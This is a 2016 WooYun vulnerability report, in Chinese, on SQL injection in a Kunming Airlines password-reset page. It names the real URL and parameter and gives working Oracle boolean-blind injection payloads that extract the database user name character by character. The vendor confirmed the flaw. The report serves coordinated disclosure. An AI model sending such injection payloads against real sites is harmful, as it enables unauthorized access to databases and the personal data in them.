当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207642

漏洞标题:昆明航空某站存在SQL注入漏洞

相关厂商:昆明航空

漏洞作者: 路人甲

提交时间:2016-05-11 21:45

修复时间:2016-06-26 12:50

公开时间:2016-06-26 12:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经确认,细节仅向厂商公开
2016-05-22: 细节向核心白帽子及相关领域专家公开
2016-06-01: 细节向普通白帽子公开
2016-06-11: 细节向实习白帽子公开
2016-06-26: 细节向公众公开

简要描述:

详细说明:

POST:

http://b2a.airkunming.com/module/hyfw/forget_passwordHr.jsp 
cname=mksxaafh&command=find&IDNo=-1' OR length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 or 'Y'='


为真时:

6.png

为假时:

7.png


USER长度为3
直接手动弄出数据吧:
第一位F(ascii:70)

cname=mksxaafh&command=find&IDNo=-1' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),1,1))=70 or 'Y'='

8.png


第二位F(ascii:70)

cname=mksxaafh&command=find&IDNo=-1' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),2,1))=70 or 'Y'='

9.png


第二位P(ascii:80)

cname=mksxaafh&command=find&IDNo=-1' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),3,1))=80 or 'Y'='

11.png


USER为:FFP

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-12 12:48

厂商回复:

感谢关注昆航。

最新状态:

暂无